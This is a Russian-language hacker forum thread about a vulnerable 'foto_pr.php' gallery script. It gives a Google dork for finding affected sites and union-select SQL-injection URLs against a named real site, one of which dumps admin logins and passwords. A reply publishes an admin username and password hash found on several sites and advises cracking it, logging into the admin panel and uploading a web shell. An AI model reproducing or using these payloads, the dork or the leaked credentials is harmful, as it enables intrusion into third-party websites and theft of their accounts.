![]() |
foto_pr.php (Уязвимость)
Начну с того что сайты с уязвимостями ищу через гулевский allinurl:
Тут недавно наткнулся на сайт фото галереи http://pix.in.ua/foto_pr.php?id=-16%20union%20select%201,2,3,4,5,6,7,version()-- и сделал скулю.. Но факт в том что при запросе в гугле allinurl: foto_pr.php вылазет много сайтов с одной и той же уязвимостью.. foto_pr.php?id=-16+union%20select+1,2,3,4,5,6,7,concat_ws(0x3a,id, name,login,pass) from gallery_admin-- Вопрос. Че это за движек такой..? =) |
Много сайтов гугл выдаёт по запросу
allinurl: com_content :D А в твоём случае их 9 штук .Это самопис какой-то ИМХО ЗЫ Была где-то тема "помогите определить движок", но видимо при последнем сбое она пропала , я не нашол во всяком случае :( |
Assembler, без названия. просто движок.. он, как видишь не так популярен.
|
Мб будет каданить =))
|
Двиг самописный - открыл сайта 3-4 из того что выдал гугл на всех одна и та же пара логин-хеш:
Код:
bolt:f07ad2552c86bfd4d2396c0114f785eaЕсли очень интересно, то бруть хеш, попадай в админку (/admin.php), заливай шелл и изучай сорцы. |
http://www.google.ru/search?hl=ru&q=f07ad2552c86bfd4d2396c0114f785ea&bt nG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2+Google&lr =&aq=f&oq=
мм, а хэш знаменит. |
Цитата:
|
| Время: 16:48 |